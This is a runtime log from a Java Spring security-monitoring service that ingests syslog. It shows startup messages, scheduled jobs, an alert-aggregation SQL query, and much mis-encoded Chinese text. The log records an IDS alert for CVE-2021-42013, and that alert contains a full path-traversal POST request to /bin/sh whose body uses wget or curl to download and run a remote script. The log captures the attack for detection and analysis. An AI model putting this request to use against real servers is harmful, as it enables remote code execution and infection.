2026-05-19 12:51:00.559 [scheduling-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:50:00.241
2026-05-19 12:51:00.691 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 12:51:00.692 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 12:51:00.849 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹1ʱ838ms
2026-05-19 12:53:24.720 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
2026-05-19 12:53:24.720 [main] INFO com.syslogApplication - Starting syslogApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 33912 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
2026-05-19 12:53:24.724 [main] INFO com.syslogApplication - No active profile set, falling back to 1 default profile: "default"
2026-05-19 12:53:27.580 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:53:27.583 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
2026-05-19 12:53:28.183 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 593 ms. Found 1 Elasticsearch repository interfaces.
2026-05-19 12:53:28.190 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:53:28.190 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
2026-05-19 12:53:28.340 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
2026-05-19 12:53:28.341 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 148 ms. Found 0 Reactive Elasticsearch repository interfaces.
2026-05-19 12:53:28.357 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:53:28.358 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
2026-05-19 12:53:28.545 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
2026-05-19 12:53:28.545 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 177 ms. Found 0 Redis repository interfaces.
2026-05-19 12:53:29.550 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8089 (http)
2026-05-19 12:53:29.563 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8089"]
2026-05-19 12:53:29.563 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
2026-05-19 12:53:29.564 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
2026-05-19 12:53:29.824 [main] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring embedded WebApplicationContext
2026-05-19 12:53:29.826 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 5039 ms
2026-05-19 12:53:29.902 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogApplication.dmColumnService
2026-05-19 12:53:34.783 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 12:53:35.237 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
2026-05-19 12:53:35.253 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
2026-05-19 12:53:35.273 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
2026-05-19 12:53:35.277 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
2026-05-19 12:53:35.336 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
2026-05-19 12:53:42.439 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== ʼʵʱ ==========
2026-05-19 12:53:42.463 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Starting...
2026-05-19 12:53:43.161 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Start completed.
2026-05-19 12:53:43.353 [main] INFO c.c.s.RealtimeAnalysisScheduler - ѯ 1 ʵʱ
2026-05-19 12:53:51.584 [main] INFO c.c.s.i.RuleExecutionTimeServiceImpl - ִʱѴڣʼruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 12:53:51.584 [main] INFO c.c.s.RealtimeAnalysisScheduler - ʼ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble
2026-05-19 12:53:51.584 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== ʵʱʼ ==========
2026-05-19 12:53:51.598 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: public static com.common.service.DeviceDeviceService com.common.service.AccessLogAlertService.deviceDeviceService
2026-05-19 12:53:51.652 [main] INFO c.c.service.AccessLogAlertService - ʼAccessLogAlertServiceϴδʱ: 2026-05-19T12:52:51.652
2026-05-19 12:53:51.884 [main] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:53:52.950 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 12:53:53.209 [main] INFO com.common.util.MyBatisUtil - MyBatis ʼɹ
2026-05-19 12:53:54.173 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
2026-05-19 12:53:54.186 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
2026-05-19 12:53:54.186 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
2026-05-19 12:53:54.188 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
2026-05-19 12:53:54.188 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
NOT STARTED.
Currently in standby mode.
Number of jobs executed: 0
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
2026-05-19 12:53:54.189 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
2026-05-19 12:53:54.189 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
2026-05-19 12:53:54.189 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@52c22bc5
2026-05-19 12:53:54.381 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 12:53:54.381 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 12:53:54.381 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779166434380
2026-05-19 12:53:54.401 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 12:53:54.401 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 12:53:54.401 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779166434401
2026-05-19 12:53:54.404 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8089"]
2026-05-19 12:53:54.421 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8089 (http) with context path '/xdrservice'
2026-05-19 12:53:54.423 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
2026-05-19 12:53:54.423 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
2026-05-19 12:53:54.441 [main] INFO com.syslogApplication - Started syslogApplication in 30.246 seconds (JVM running for 34.98)
2026-05-19 12:53:54.680 [scheduling-10] INFO c.c.s.RealtimeAnalysisScheduler - ִй: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, nextTime=2026-05-19T12:51, now=2026-05-19T12:53:54.439
2026-05-19 12:53:54.681 [scheduling-10] INFO c.c.s.impl.AnalysisRuleServiceImpl - ִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 12:53:54.804 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: []
2026-05-19 12:53:54.870 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: [test-topic-0]
2026-05-19 12:53:55.154 [scheduling-10] INFO c.c.s.impl.RealtimeAnalysisEngine - ڲѯΧ: ڴС=10mѯʱ䷶Χ=[2026-05-19 12:43:00, 2026-05-19 12:53:00]
2026-05-19 12:53:55.154 [scheduling-10] INFO c.c.s.impl.RealtimeAnalysisEngine - ʼִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, batchNo=20260519125354835, windowType=tumble, dataStartTime=2026-05-19 12:43:00, dataEndTime=2026-05-19 12:53:00
2026-05-19 12:53:56.439 [scheduling-10] INFO c.c.s.impl.RealtimeAnalysisEngine - ɵSQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 12:43:00' AND log_time < '2026-05-19 12:53:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 12:53:56.918 [scheduling-10] INFO c.c.s.impl.RealtimeAnalysisEngine - ִгɹ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 12:53:57.235 [scheduling-10] INFO c.c.s.i.RuleExecutionTimeServiceImpl - ¹´ִʱ䣬ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble, nextExecuteTime=2026-05-19 13:03:00
2026-05-19 12:53:57.236 [scheduling-10] INFO c.c.s.RealtimeAnalysisScheduler - εִй: 1, : 0
2026-05-19 12:54:00.014 [scheduling-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:54:00.014 [log-processor-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:54:00.243 [scheduling-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:54:00.243 [log-processor-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:54:00.921 [log-processor-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:52:51.652
2026-05-19 12:54:00.922 [scheduling-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:52:51.652
2026-05-19 12:54:05.873 [http-nio-8089-exec-1] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring DispatcherServlet 'dispatcherServlet'
2026-05-19 12:54:05.873 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Initializing Servlet 'dispatcherServlet'
2026-05-19 12:54:05.875 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Completed initialization in 1 ms
2026-05-19 12:54:11.543 [http-nio-8089-exec-3] INFO com.controllers.SyslogPushController - յsyslog: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"APTսԤ", "deviceProductType":"ּϵͳ", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"й", "srcGeoRegion":"", "srcGeoCity":"", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"й", "destGeoRegion":"", "destGeoCity":"", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "alarmType":"WEB->·", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013). Դ192.168.101.1/41614, Ŀģ192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 12:54:11.543 [http-nio-8089-exec-3] INFO com.common.service.SyslogService - ʼsyslogϢ: IP=192.168.0.124, Port=514
2026-05-19 12:54:11.545 [http-nio-8089-exec-3] INFO com.common.service.SyslogService - TCP SyslogϢͳɹ: 192.168.0.124:514
2026-05-19 12:54:11.545 [http-nio-8089-exec-3] INFO com.controllers.SyslogPushController - SyslogϢͳɹ: IP=192.168.0.124, Port=514
2026-05-19 12:54:13.589 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - ʼϢ: 1
2026-05-19 12:54:14.227 [log-processor-2] INFO c.Modules.NormalData.SysLogProcessor - յsyslogmessage[receive_time=20260519125411844 device_id=103 device_name=˾ڲ̽ vendor=null data_type=json device_collect_id=1]<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"????", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"????APT??????????????????", "deviceProductType":"????????", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"??", "srcGeoRegion":"???", "srcGeoCity":"???", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"??", "destGeoRegion":"???", "destGeoCity":"???", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ???????? (CVE-2021-42013)", "alarmType":"WEB????->??????", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ???????? (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ???????? (CVE-2021-42013). ?????192.168.101.1/41614, ????192.168.101.173/80"}
2026-05-19 12:54:14.390 [log-processor-2] WARN c.c.service.LogDataFilterService - -ݹ˹ΪգĬϲ!
2026-05-19 12:54:14.679 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - δɣ: 1
2026-05-19 12:55:00.011 [scheduling-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:55:00.011 [log-processor-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:55:00.106 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 12:55:00.242 [scheduling-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:55:00.252 [log-processor-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:55:00.293 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ1ʱ187ms
2026-05-19 12:55:00.294 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T12:55:00.294
2026-05-19 12:55:00.302 [scheduling-6] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T12:55:00.302
2026-05-19 12:55:00.490 [scheduling-9] INFO c.c.service.AccessLogAlertService - ȡ 1 µ־ݣʱ䷶Χ: 2026-05-19T12:52:51.652 2026-05-19T12:55:00.242
2026-05-19 12:55:00.490 [scheduling-9] INFO c.c.service.AccessLogAlertService - ʼ㷨: 㷨3 (ID: 2004083121877696514)
2026-05-19 12:55:00.641 [scheduling-9] INFO c.c.service.AccessLogAlertService - 㷨3 δ
2026-05-19 12:55:00.641 [scheduling-9] INFO c.c.service.AccessLogAlertService - ־ɣ´ν 2026-05-19T12:55:00.242 ʼ
2026-05-19 12:55:00.776 [scheduling-6] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 12:55:00.777 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 483ms
2026-05-19 12:55:00.851 [log-processor-3] INFO c.c.service.AccessLogAlertService - ȡ 1 µ־ݣʱ䷶Χ: 2026-05-19T12:55:00.242 2026-05-19T12:55:00.252
2026-05-19 12:55:00.852 [log-processor-3] INFO c.c.service.AccessLogAlertService - ʼ㷨: 㷨3 (ID: 2004083121877696514)
2026-05-19 12:55:00.900 [log-processor-3] INFO c.c.service.AccessLogAlertService - 㷨3 δ
2026-05-19 12:55:00.900 [log-processor-3] INFO c.c.service.AccessLogAlertService - ־ɣ´ν 2026-05-19T12:55:00.252 ʼ
2026-05-19 12:56:00.005 [scheduling-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:56:00.005 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T12:56:00.005
2026-05-19 12:56:00.005 [log-processor-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:56:00.227 [scheduling-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:56:00.227 [log-processor-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:56:00.436 [scheduling-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:55:00.252
2026-05-19 12:56:00.436 [log-processor-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:55:00.252
2026-05-19 12:56:00.903 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 1 м¼
2026-05-19 12:56:00.903 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 12:56:00.903 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ1
2026-05-19 12:56:01.053 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 12:56:01.053 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 12:56:01.206 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹1ʱ1201ms
2026-05-19 12:57:00.003 [scheduling-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:57:00.004 [log-processor-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:57:00.228 [log-processor-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:57:00.229 [scheduling-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:57:00.466 [log-processor-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:55:00.252
2026-05-19 12:57:00.467 [scheduling-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:55:00.252
2026-05-19 12:58:00.002 [scheduling-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:58:00.003 [log-processor-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:58:00.227 [log-processor-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:58:00.230 [scheduling-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:58:00.495 [log-processor-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:55:00.252
2026-05-19 12:58:00.498 [scheduling-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:55:00.252
2026-05-19 12:59:00.008 [scheduling-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:59:00.009 [log-processor-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:59:00.231 [scheduling-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:59:00.234 [log-processor-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:59:00.503 [log-processor-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:55:00.252
2026-05-19 12:59:00.646 [scheduling-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:55:00.252
2026-05-19 13:00:00.003 [scheduling-1] INFO c.c.s.AlarmHealthCheckScheduler - ========== ʼִи澯 ==========
2026-05-19 13:00:00.003 [scheduling-6] INFO c.c.s.ProbeStatusCheckScheduler - ========== ʼ̽״̬ ==========
2026-05-19 13:00:00.003 [scheduling-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 13:00:00.004 [log-processor-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 13:00:00.077 [scheduling-10] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 13:00:00.225 [scheduling-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 13:00:00.228 [scheduling-6] INFO c.c.s.ProbeStatusCheckScheduler - ̽״̬ɣ̽, ʱ: 225ms
2026-05-19 13:00:00.228 [log-processor-8] INFO c.c.service.AccessLogAlertService - 1 õ
